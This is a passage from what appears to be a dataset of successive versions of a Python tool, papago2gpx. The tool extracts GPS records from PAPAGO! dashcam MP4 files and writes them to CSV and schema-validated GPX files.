0:\n if year != 0:\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: `year != 0' but `day == 0'.\"\n )\n assert month == 0\n assert hour == 0\n assert minute == 0\n assert second == 0\n elif day < 1 or 31 < day:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect the day of time, but got an invalid value `{day}'.\"\n )\n if year == 0:\n assert month == 0\n assert day == 0\n assert hour == 0\n assert minute == 0\n assert second == 0\n time = None\n else:\n time = datetime.datetime.now(datetime.timezone.utc)\n time = time.astimezone()\n time = time.replace(year=year, month=month, day=day, hour=\n hour, minute=minute, second=second, microsecond=0)\n time = Time(time)\n if time is None:\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero-padding, but got EOF.'\n )\n padding = int.from_bytes(padding, 'little')\n if padding != 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero-padding, but got `{padding}'.\"\n )\n status = None\n latitude_type = '0'\n longitude_type = '0'\n else:\n status = mp4_file.read(1)\n if len(status) < 1:\n error_position = format(mp4_file.tell() - len(status),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a status character, but got EOF.'\n )\n status = status.decode('UTF-8')\n if status not in ('A', 'V'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `A' or `V' as a status character, but got an invalid character `{status}'.\"\n )\n latitude_type = mp4_file.read(1)\n if len(latitude_type) < 1:\n error_position = format(mp4_file.tell() - len(\n latitude_type), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a latitude type, but got EOF.'\n )\n latitude_type = latitude_type.decode('UTF-8')\n if status == 'A':\n if latitude_type not in ('N', 'S'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `N' or `S' as a latitude type, but got an invalid character `{latitude_type}'.\"\n )\n else:\n assert status == 'V'\n if latitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `0' as a latitude type, but got an invalid character `{latitude_type}'.\"\n )\n longitude_type = mp4_file.read(1)\n if len(longitude_type) < 1:\n error_position = format(mp4_file.tell() - len(\n longitude_type), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect a longitude type, but got EOF.'\n )\n longitude_type = longitude_type.decode('UTF-8')\n if status == 'A':\n if longitude_type not in ('E', 'W'):\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `E' or `W' as a longitude type, but got an invalid character `{longitude_type}'.\"\n )\n else:\n assert status == 'V'\n if longitude_type != '0':\n error_position = format(mp4_file.tell() - 1, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect `0' as a longitude type, but got an invalid character `{longitude_type}'.\"\n )\n padding = mp4_file.read(1)\n if len(padding) < 1:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n if padding[0] != 0:\n error_position = format(mp4_file.tell() - 1, '#010x')\n byte = format(padding[0], '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n if status == 'A':\n latitude_dmm = read_little_endian_single(mp4_file)\n latitude_degree = math.floor(latitude_dmm / 100)\n if latitude_degree < 0 or 90 < latitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\"\n )\n latitude_minute = latitude_dmm - latitude_degree * 100\n if latitude_minute < 0 or 60 <= latitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a latitude in DMM format, but got an invalid value `{latitude_dmm}'.\"\n )\n latitude_degree += latitude_minute / 60\n latitude = Latitude(latitude_degree)\n else:\n assert status == 'V' or status is None\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 4 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n latitude = None\n if status == 'A':\n longitude_dmm = read_little_endian_single(mp4_file)\n longitude_degree = math.floor(longitude_dmm / 100)\n if longitude_degree < 0 or 180 < longitude_degree:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a longitude in DMM format, but got an invalid value `{longitude_dmm}'.\"\n )\n longitude_minute = longitude_dmm - longitude_degree * 100\n if longitude_minute < 0 or 60 <= longitude_minute:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect a longitude in DMM format, but got an invalid value `{longitude_dmm}'.\"\n )\n longitude_degree += longitude_minute / 60\n longitude = Longitude(longitude_degree)\n else:\n assert status == 'V' or status is None\n padding = mp4_file.read(4)\n if len(padding) < 4:\n error_position = format(mp4_file.tell() - len(padding),\n '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect zero padding, but got EOF.'\n )\n for j, b in enumerate(padding):\n if b != 0:\n error_position = format(mp4_file.tell() - 4 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n longitude = None\n speed = read_little_endian_single(mp4_file)\n speed *= 1852 / 3600\n speed = Speed(speed)\n azimuth = read_little_endian_single(mp4_file)\n if azimuth < 0 or 360 <= azimuth:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect azimuth degree, but got an invalid value `{azimuth}'.\"\n )\n azimuth = Azimuth(azimuth)\n x_acceleration = mp4_file.read(4)\n if len(x_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n x_acceleration), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect X-axis acceleration, but got EOF.'\n )\n x_acceleration = int.from_bytes(x_acceleration, 'little',\n signed=True)\n y_acceleration = mp4_file.read(4)\n if len(y_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n y_acceleration), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect Y-axis acceleration, but got EOF.'\n )\n y_acceleration = int.from_bytes(y_acceleration, 'little',\n signed=True)\n z_acceleration = mp4_file.read(4)\n if len(z_acceleration) < 4:\n error_position = format(mp4_file.tell() - len(\n z_acceleration), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect Z-axis acceleration, but got EOF.'\n )\n z_acceleration = int.from_bytes(z_acceleration, 'little',\n signed=True)\n if mp4_file.tell() != small_block_end:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect the end of a GPS data block, but got additional data.'\n )\n padding_size = large_block_end - small_block_end\n if padding_size < 532:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect more than or equal to 532-byte padding, but got only {padding_size}-byte padding.'\n )\n padding = mp4_file.read(padding_size)\n if len(padding) < padding_size:\n error_position = format(mp4_file.tell() - len(padding), '#010x'\n )\n raise GpsDataError(\n f'{mp4_file.name}:{error_position}: Expect {padding_size}-byte padding, but got EOF.'\n )\n for j, b in enumerate(padding[:420]):\n if b != 0:\n error_position = format(small_block_end + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n if padding[420:532] != _UNKNOWN_BYTES:\n for j, b in enumerate(padding[420:532]):\n if b != 0:\n error_position = format(small_block_end + 420 + j,\n '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n for j, b in enumerate(padding[532:]):\n if b != 0:\n error_position = format(small_block_end + 532 + j, '#010x')\n byte = format(b, '#04x')\n raise GpsDataError(\n f\"{mp4_file.name}:{error_position}: Expect zero padding, but got an invalid byte `{byte}'.\"\n )\n track_point = TrackPoint(time, status, latitude, longitude,\n speed, azimuth, x_acceleration, y_acceleration, z_acceleration)\n track_points.append(track_point)\n return track_points\n\n\ndef read_input_paths(input_paths: List[pathlib.Path]) ->List[TrackPoint]:\n track_points = []\n for input_path in input_paths:\n if input_path.is_dir():\n file_paths = []\n for dirpath, dirnames, filenames in os.walk(input_path):\n dirpath = pathlib.Path(dirpath)\n for filename in filenames:\n file_path = dirpath / filename\n if file_path.suffix not in ('.mp4', '.MP4'):\n continue\n file_paths.append(file_path)\n file_paths.sort()\n for file_path in file_paths:\n track_points.extend(parse_mp4_file(file_path))\n else:\n track_points.extend(parse_mp4_file(input_path))\n return track_points\n\n\ndef write_csv_file(args: Arguments, track_points: List[TrackPoint]\n ) ->pathlib.Path:\n if args.name is None:\n print(\"`--name' is required to output a CSV file.\", file=sys.stderr)\n sys.exit(1)\n csv_file_path = pathlib.Path(f'{args.name}.csv')\n if csv_file_path.exists():\n if not args.overwrite:\n print(f'{csv_file_path}: File already exists.', file=sys.stderr)\n sys.exit(1)\n with open(csv_file_path, 'w') as csv_file:\n for track_point in track_points:\n print(track_point.format_as_csv(), file=csv_file)\n return csv_file_path\n\n\ndef create_track_segments(args: Arguments, track_points: List[TrackPoint]\n ) ->List[TrackSegment]:\n new_track_points = []\n for track_point in track_points:\n if track_point.status != 'A':\n assert track_point.latitude is None\n assert track_point.longitude is None\n continue\n assert track_point.latitude is not None\n assert track_point.longitude is not None\n new_track_points.append(track_point)\n track_points = new_track_points\n track_points.sort()\n if len(track_points) == 0:\n return []\n unique_track_points = []\n it = iter(track_points)\n representative_track_point = next(it)\n while True:\n track_point = next(it, None)\n if track_point is None:\n unique_track_points.append(representative_track_point)\n break\n if track_point.time != representative_track_point.time:\n unique_track_points.append(representative_track_point)\n representative_track_point = track_point\n continue\n if (track_point.latitude == representative_track_point.latitude and\n track_point.longitude == representative_track_point.longitude):\n continue\n if args.how_to_unique == 'first':\n continue\n elif args.how_to_unique == 'last':\n representative_track_point = track_point\n else:\n raise RuntimeError(\n \"There exist track points with the same timestamp but different coordinates. Use `--uniq' option.\"\n )\n track_segments = []\n track_segments.append(TrackSegment())\n for track_point in unique_track_points:\n track_segments[0].append_track_point(track_point)\n return track_segments\n\n\ndef as_xml_attribute(data: str) ->str:\n return xml.sax.saxutils.quoteattr(data)\n\n\ndef as_xml_data(data: str) ->str:\n return xml.sax.saxutils.escape(data)\n\n\ndef get_local_time_in_iso8601() ->str:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n local_time_in_iso8601 = local_aware_now.strftime('%Y-%m-%dT%H:%M:%S%z')\n return re.sub('([+-]\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', local_time_in_iso8601)\n\n\ndef write_gpx_file(args: Arguments, track_segments: List[TrackSegment]\n ) ->pathlib.Path:\n all_track_points = []\n for track_segment in track_segments:\n for track_point in track_segment:\n all_track_points.append(track_point)\n name = args.name\n if name is None:\n if len(all_track_points) == 0:\n raise ValueError(\n \"`--name' is not specified, and there is no track point.\")\n all_track_points.sort()\n name = all_track_points[0].name\n gpx_file_path = pathlib.Path(f'{name}.gpx')\n bounds = None\n if len(all_track_points) > 0:\n latitudes = list(t.latitude for t in all_track_points)\n latitudes.sort()\n longitudes = list(t.longitude for t in all_track_points)\n longitudes.sort()\n bounds = latitudes[0], longitudes[0], latitudes[-1], longitudes[-1]\n if gpx_file_path.exists():\n if not args.overwrite:\n print(f'{gpx_file_path}: Error: File already exists.', file=sys\n .stderr)\n sys.exit(1)\n with open(gpx_file_path, 'w') as gpx_file:\n print('<?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"no\" ?>',\n file=gpx_file)\n print(\n '<gpx xmlns=\"http://www.topografix.com/GPX/1/1\" version=\"1.1\" creator=\"papago2gpx\">'\n , file=gpx_file)\n print(' <metadata>', file=gpx_file)\n print(f' <name>{as_xml_data(name)}</name>', file=gpx_file)\n if args.description is not None:\n description = as_xml_data(args.description)\n print(f' <desc>{description}</desc>', file=gpx_file)\n if args.author_name is not None or args.author_email is not None:\n print(' <author>', file=gpx_file)\n if args.author_name is not None:\n author_name = as_xml_data(args.author_name)\n print(f' <name>{author_name}</name>', file=gpx_file)\n if args.author_email is not None:\n author_email_parts = args.author_email.split('@', 1)\n if len(author_email_parts) != 2:\n raise RuntimeError(\n f'An invalid E-mail address: {args.author_email}')\n author_email_id = as_xml_attribute(author_email_parts[0])\n author_email_domain = as_xml_attribute(author_email_parts[1])\n print(\n f' <email id={author_email_id} domain={author_email_domain}/>'\n , file=gpx_file)\n print(' </author>', file=gpx_file)\n if args.copyright is not None:\n copyright = as_xml_attribute(args.copyright)\n print(f' <copyright author={copyright}', end='', file=gpx_file)\n copyright_year = args.copyright_year\n copyright_license = args.copyright_license\n if copyright_year is not None or copyright_license is not None:\n print('>', file=gpx_file)\n if copyright_year is not None:\n copyright_year = as_xml_data(str(copyright_year))\n print(f' <year>{copyright_year}</year>', file=gpx_file\n )\n if copyright_license is not None:\n copyright_license = as_xml_data(copyright_license)\n print(f' <license>{copyright_license}</license>',\n file=gpx_file)\n print(' </copyright>', file=gpx_file)\n else:\n print('/>', file=gpx_file)\n print(f' <time>{get_local_time_in_iso8601()}</time>', file=gpx_file)\n if args.keywords is not None:\n keywords = as_xml_data(args.keywords)\n print(f' <keywords>{keywords}</keywords>', file=gpx_file)\n if bounds is not None:\n print(\n f' <bounds minlat=\"{bounds[0]}\" minlon=\"{bounds[1]}\" maxlat=\"{bounds[2]}\" maxlon=\"{bounds[3]}\"/>'\n , file=gpx_file)\n print(' </metadata>', file=gpx_file)\n print(' <trk>', file=gpx_file)\n if args.track_name is not None:\n track_name = as_xml_data(args.track_name)\n print(f' <name>{track_name}</name>', file=gpx_file)\n if args.track_comment is not None:\n track_comment = as_xml_data(args.track_comment)\n print(f' <cmt>{track_comment}</cmt>', file=gpx_file)\n if args.track_description is not None:\n track_description = as_xml_data(args.track_description)\n print(f' <desc>{track_description}</desc>', file=gpx_file)\n if args.track_type is not None:\n track_type = as_xml_data(args.track_type)\n print(f' <type>{track_type}</type>', file=gpx_file)\n for track_segment in track_segments:\n print(' <trkseg>', file=gpx_file)\n for track_point in track_segment:\n print(\n f' <trkpt lat=\"{track_point.latitude}\" lon=\"{track_point.longitude}\">'\n , file=gpx_file)\n print(f' <time>{track_point.time}</time>', file=gpx_file\n )\n print(' </trkpt>', file=gpx_file)\n print(' </trkseg>', file=gpx_file)\n print(' </trk>', file=gpx_file)\n print('</gpx>', file=gpx_file)\n proc = subprocess.run(['xmllint', '--schema', 'gpx.xsd', str(\n gpx_file_path)], stdin=subprocess.DEVNULL, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, encoding='UTF-8')\n if proc.returncode != 0:\n print(\n f\"\"\"Failed to validate the GPX file `{gpx_file_path}'.\ncommand: {proc.args}\nstdout: {proc.stdout}\nstderr: {proc.stderr}\nreturncode: {proc.returncode}\"\"\"\n , file=sys.stderr)\n return gpx_file_path\n\n\nif __name__ == '__main__':\n args = Arguments()\n track_points = read_input_paths(args.input_paths)\n csv_file_path = write_csv_file(args, track_points)\n print(f\"Succeeded! The result is output to `{csv_file_path}'.\")\n track_segments = create_track_segments(args, track_points)\n if args.name is None and len(track_segments) == 0:\n print(\"`--name' is not specified, and there is no track segment.\",\n file=sys.stderr)\n sys.exit(1)\n if len(track_segments) == 0:\n print('WARNING: There is no track segment.', file=sys.stderr)\n gpx_file_path = write_gpx_file(args, track_segments)\n print(f\"Succeeded! The result is output to `{gpx_file_path}'.\")\n sys.exit(0)\n",
"step-5": "#!/usr/bin/env python3\n\nimport re\nimport datetime\nimport math\nimport pathlib\nimport os\nimport io\nimport argparse\nimport subprocess\nimport xml.sax.saxutils\nfrom typing import (Optional, List, Iterable)\nimport sys\n\n\n_DEFAULT_TRACK_TYPE = 'Dashcam track'\n\n\nclass Arguments(object):\n def __init__(self):\n parser = argparse.ArgumentParser(\n prog='papago2gpx', description='Extract GPS data from MP4 video\\\n files created by PAPAGO! dashcams, and format them into a GPX file.')\n parser.add_argument('input_paths', nargs='+',\n help='The path to an input file or directory.',\n metavar='INPUT_PATH')\n parser.add_argument('--name', help='The name of the GPX file to\\\n output. Default to 16 deciaml digits representing the first GPS record time.',\n metavar='NAME')\n parser.add_argument('--description', help='The description of the GPX\\\n file to output.', metavar='DESCRIPTION')\n parser.add_argument('--author-name', help='The name of the author of\\\n the GPX file to output.', metavar='AUTHOR_NAME')\n parser.add_argument('--author-email', help='The Email address of the\\\n author of the GPX file to output.', metavar='AUTHOR_EMAIL')\n parser.add_argument('--copyright', help=\"The copyright holder of the\\\n GPX file to output. Default to `AUTHOR_NAME'.\", metavar='COPYRIGHT')\n parser.add_argument('--copyright-year', help=\"The copyright year of\\\n the GPX file to output. Default to the year the file is created.\",\n metavar='COPYRIGHT_YEAR')\n parser.add_argument('--copyright-license', help='A link to an external\\\n file containing license text.', metavar='LICENSE')\n parser.add_argument('--keywords', help='Keywords associated with the\\\n GPX file to output.', metavar='KEYWORDS')\n parser.add_argument('--track-name', help='The name of the track.',\n metavar='TRACK_NAME')\n parser.add_argument(\n '--track-comment', help='The comment of the track.',\n metavar='TRACK_COMMENT')\n parser.add_argument('--track-description', help=\"The description of\\\n the track.\", metavar='TRACK_DESCRIPTION')\n parser.add_argument(\n '--track-type', default=_DEFAULT_TRACK_TYPE,\n help=f\"The type of the track. Default to `{_DEFAULT_TRACK_TYPE}'.\")\n parser.add_argument('--uniq', choices=['first', 'last'],\n help='How to process different coordinates\\\n recorded at the same timestamp. Default to an error.')\n parser.add_argument('--overwrite', action='store_true',\n help='Allow to overwrite an existing file.')\n\n args = parser.parse_args()\n\n self._input_paths = []\n for input_path in args.input_paths:\n input_path = pathlib.Path(input_path)\n if not input_path.exists():\n print(f\"{input_path}: File does not exist.\", file=sys.stderr)\n sys.exit(1)\n self._input_paths.append(input_path)\n\n self._name = args.name\n\n self._description = args.description\n\n self._author_name = args.author_name\n\n self._author_email = args.author_email\n\n self._copyright = args.copyright\n if self._copyright is None and self._author_name is not None:\n self._copyright = self._author_name\n\n self._copyright_year = args.copyright_year\n if self._copyright_year is not None and self._copyright is None:\n print(\"`--copyright-year' is specified, but `--copyright' is not.\",\n file=sys.stderr)\n sys.exit(1)\n if self._copyright_year is None and self._copyright is not None:\n utc_now = datetime.datetime.now(datetime.timezone.utc)\n local_aware_now = utc_now.astimezone()\n self._copyright_year = local_aware_now.year\n\n self._copyright_license = args.copyright_license\n if self._copyright_license is not None and self._copyright is None:\n print(\"`--copyright-license' is specified, but `--copyright' is\\\n not.\", file=sys.stderr)\n sys.exit(1)\n\n self._keywords = args.keywords\n\n self._track_name = args.track_name\n\n self._track_comment = args.track_comment\n\n self._track_description = args.track_description\n\n self._track_type = args.track_type\n if self._track_type is None:\n self._track_type = _DEFAULT_TRACK_TYPE\n if self._track_type == '':\n self._track_type = None\n\n self._how_to_unique = args.uniq\n\n self._overwrite = args.overwrite\n\n @property\n def input_paths(self) -> List[pathlib.Path]:\n return self._input_paths\n\n @property\n def name(self) -> Optional[str]:\n return self._name\n\n @property\n def description(self) -> Optional[str]:\n return self._description\n\n @property\n def author_name(self) -> Optional[str]:\n return self._author_name\n\n @property\n def author_email(self) -> Optional[str]:\n return self._author_email\n\n @property\n def copyright(self) -> Optional[str]:\n return self._copyright\n\n @property\n def copyright_year(self) -> Optional[int]:\n return self._copyright_year\n\n @property\n def copyright_license(self) -> Optional[str]:\n return self._copyright_license\n\n @property\n def keywords(self) -> Optional[str]:\n return self._keywords\n\n @property\n def track_name(self) -> Optional[str]:\n return self._track_name\n\n @property\n def track_comment(self) -> Optional[str]:\n return self._track_comment\n\n @property\n def track_description(self) -> Optional[str]:\n return self._track_description\n\n @property\n def track_type(self) -> Optional[str]:\n return self._track_type\n\n @property\n def how_to_unique(self) -> str:\n return self._how_to_unique\n\n @property\n def overwrite(self) -> bool:\n return self._overwrite\n\n\nclass BrokenMp4FileError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataError(RuntimeError):\n def __init__(self, message: str):\n super().__init__(message)\n\n\nclass GpsDataBlockIndex(object):\n def __init__(self, position: int, size: int):\n if position <= 0:\n raise ValueError(f\"An invalid position: `{position}'.\")\n if size <= 0:\n raise ValueError(f\"An invalid size: `{size}'.\")\n self._position = position\n self._size = size\n\n @property\n def position(self) -> int:\n return self._position\n\n @property\n def size(self) -> int:\n return self._size\n\n\ndef get_gps_data_block_indices(mp4_file: io.FileIO) -> List[GpsDataBlockIndex]:\n target_box_path = ['moov', 'gps ']\n while True:\n box_size = mp4_file.read(4)\n if len(box_size) == 0:\n raise GpsDataError(\n f'{mp4_file.name}: Could not find any GPS data block index.')\n if len(box_size) < 4:\n error_position = format(mp4_file.tell() - len(box_size), '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the size of a box, but got EOF.')\n box_size = int.from_bytes(box_size, 'big')\n\n box_type = mp4_file.read(4)\n if len(box_type) < 4:\n error_position = format(mp4_file.tell() - len(box_type), '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the type of a box, but got EOF.')\n box_type = box_type.decode('UTF-8')\n\n if box_size == 0:\n box_size = None\n next_position = None\n elif box_size == 1:\n box_size = mp4_file.read(8)\n if len(box_size) < 8:\n error_position = format(mp4_file.tell() - len(box_size),\n '#010x')\n raise BrokenMp4FileError(f'{mp4_file.name}:{error_position}:\\\n Expect the size of a box, but got EOF.')\n box_size = int.from_bytes(box_size, 'big')\n next_position = mp4_file.tell() + box_size - 16\n else:\n next_position = mp4_file.tell() + box_size - 8\n\n if box_type == target_box_path[0]:\n target_box_path.pop(0)\n if len(target_box_path) == 0:\n break\n else:\n if next_position is None:\n raise GpsDataError(f'{mp4_file.name}: Could not find any GPS'\n ' data block index.')\n mp4_file.seek(next_position)\n if mp4_file.tell() != next_position:\n raise BrokenMp4FileError(f'{mp4_file.name}: The size of a box\\\n is not equal to the actual one.')\n\n unknown = mp4_file.read(4)\n if len(unknown) < 4:\n error_position = format(mp4_file.tell() - len(unknown), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'\n ' big-endian 32-bit unsigned integer, but got EOF.')\n unknown = int.from_bytes(unknown, 'big')\n if unknown != 257:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect a\\\n big-endian 32-bit unsigned integer with value `257', but got `{unknown}'.\")\n\n gps_data_block_count = mp4_file.read(4)\n if len(gps_data_block_count) < 4:\n error_position = format(mp4_file.tell() - len(gps_data_block_count),\n '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a'\n ' big-endian 32-bit unsigned integer, but got EOF.')\n gps_data_block_count = int.from_bytes(gps_data_block_count, 'big')\n\n gps_data_block_indices = []\n for i in range(gps_data_block_count):\n position = mp4_file.read(4)\n if len(position) < 4:\n error_position = format(mp4_file.tell() - len(position), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'\n ' position of a GPS data block, but got EOF.')\n position = int.from_bytes(position, 'big')\n if position < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect the\\\n position of a GPS data block, but got an invalid value `{position}'.\")\n\n size = mp4_file.read(4)\n if len(size) < 4:\n error_position = format(mp4_file.tell() - len(size), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect the'\n ' size of a GPS data block, but got EOF.')\n size = int.from_bytes(size, 'big')\n if size < 0:\n error_position = format(mp4_file.tell() - 4, '#010x')\n raise GpsDataError(f\"{mp4_file.name}:{error_position}: Expect the\\\n size of a GPS data block, but got an invalid value `{size}'.\")\n\n if position == 0 or size == 0:\n print(f'{mp4_file.name}: Warning: The index of GPS data blocks is\\\n not recorded.', file=sys.stderr)\n else:\n gps_data_block_index = GpsDataBlockIndex(position, size)\n gps_data_block_indices.append(gps_data_block_index)\n\n if mp4_file.tell() != next_position:\n error_position = format(mp4_file.tell(), '#010x')\n raise GpsDataError(f'{mp4_file_path}:{error_position}: Expect EOF, but'\n ' find additional data.')\n\n return gps_data_block_indices\n\n\ndef read_little_endian_single(mp4_file: io.FileIO) -> float:\n data = mp4_file.read(4)\n if len(data) < 4:\n error_position = format(mp4_file.tell() - len(data), '#010x')\n raise GpsDataError(f'{mp4_file.name}:{error_position}: Expect a\\\n little-endian single-precision floating point number, but got EOF.')\n data = int.from_bytes(data, 'little')\n\n sign = (data & 0x80000000) >> 31\n exponent = ((data & 0x7F800000) >> 23) - 127\n mantissa = (data & 0x007FFFFF) | 0x00800000\n\n sign = '+' if sign == 0 else '-'\n exponent = str(exponent - 23)\n mantissa_hex = format(mantissa, '08x')\n return float.fromhex(f'{sign}0x{mantissa_hex}p{exponent}')\n\n\nclass Time(object):\n def __init__(self, time: datetime.datetime):\n if time.tzinfo is None:\n raise ValueError(\n \"Expect an aware `datetime' object, but got naive one.\")\n\n self._time = time.astimezone(datetime.timezone.utc)\n\n def as_local_time(self) -> datetime.datetime:\n return self._time.astimezone()\n\n def __repr__(self) -> str:\n result = self._time.strftime(\"%Y-%m-%dT%H:%M:%S%z\")\n return re.sub('(\\\\+\\\\d{2})(\\\\d{2})$', '\\\\1:\\\\2', result)\n\n def __lt__(self, other) -> bool:\n return self._time < other._time\n\n def __eq__(self, other) -> bool:\n return self._time == other._time\n\n\nclass Latitude(object):\n def __init__(self, degree: float):\n if degree < -90 or 90 < degree:\n raise ValueError(\"An invalid latitude degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) -> bool:\n return self._degree < other._degree\n\n def __eq__(self, other) -> bool:\n return self._degree == other._degree\n\n\nclass Longitude(object):\n def __init__(self, degree: float):\n if degree < -180 or 180 < degree:\n raise ValueError(\"An invalid longitude degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.6F')\n\n def __lt__(self, other) -> bool:\n return self._degree < other._degree\n\n def __eq__(self, other) -> bool:\n return self._degree == other._degree\n\n\nclass Speed(object):\n def __init__(self, meter_per_second: float):\n self._meter_per_second = meter_per_second\n\n def __repr__(self) -> str:\n return format(self._meter_per_second, '.2F')\n\n\nclass Azimuth(object):\n def __init__(self, degree: float):\n if degree < 0 or 360 <= degree:\n raise ValueError(f\"An invalid azimuth degree: `{degree}'.\")\n\n self._degree = degree\n\n def __repr__(self) -> str:\n return format(self._degree, '.2F')\n\n\nclass TrackPoint(object):\n def __init__(self, time: Time, status: str, latitude: Optional[Latitude],\n longitude: Optional[Longitude], speed: Speed,\n azimuth: Azimuth, x_acceleration: int, y_acceleration: int,\n z_acceleration: int):\n if (status == 'V' or status is None) != (latitude is None):\n raise ValueError('Inconsistent arguments:'\n f' status = {status}, latitude = {latitude}')\n if (status == 'V' or status is None) != (longitude is None):\n raise ValueError('Inconsistent arguments:'\n f' status = {status}, longitude = {longitude}')\n\n self._time = time\n self._status = status\n self._latitude = latitude\n self._longitude = longitude\n self._speed = speed\n self._azimuth = azimuth\n self._x_acceleration = x_acceleration\n self._y_acceleration = y_acceleration\n self._z_acceleration = z_acceleration\n\n @property\n def time(self) -> Time:\n return self._time\n\n @property\n def status(self) -> str:\n return self._status\n\n @property\n def latitude(self) -> Optional[Latitude]:\n return self._latitude\n\n @property\n def longitude(self) -> Optional[Longitude]:\n return self._longitude\n\n @property\n def speed(self) -> Speed:\n return self._speed\n\n @property\n def azimuth(self) -> Azimuth:\n return self._azimuth\n\n @property\n def x_acceleration(self) -> int:\n return self._x_acceleration\n\n @property\n def y_acceleration(self) -> int:\n return self._y_acceleration\n\n @property\n def z_acceleration(self) -> int:\n return self._z_acceleration\n\n @property\n def name(self) -> str:\n local_time = self._time.as_local_time()\n return local_time.strftime('%Y%m%d%H%M%S')\n\n def format_as_csv(self) -> str:\n if self._time is not None:\n local_time = self._time.as_local_time()\n result = local_time.strftime('%Y/%m/%d %H:%M:%S')\n else:\n result = ''\n status = self._status if self._status is not None else ''\n result += f',{status}'\n latitude = str(self._latitude) if self._latitude is not None else ''\n result += f',{latitude}'\n longitude = str(self._longitude) if self._longitude is not None else ''\n result += f',{longitude}'\n result += f',{self._speed}'\n result += f',{self._azimuth}'\n result += f',{self._x_acceleration}'\n result += f',{self._y_acceleration}'\n result += f',{self._z_acceleration}'\n return result\n\n def __repr__(self) -> str:\n latitude = str(self._latitude) if self._latitude is not None else ''\n longitude = str(self._longitude) if self._longitude is not None else ''\n return f'{self._time},{latitude},{longitude}'\n\n def __lt__(self, other) -> bool:\n return self._time < other._time\n\n def __eq__(self, other) -> bool:\n return self._time == other._time and self._latitude == other._latitude\\\n and self._longitude == 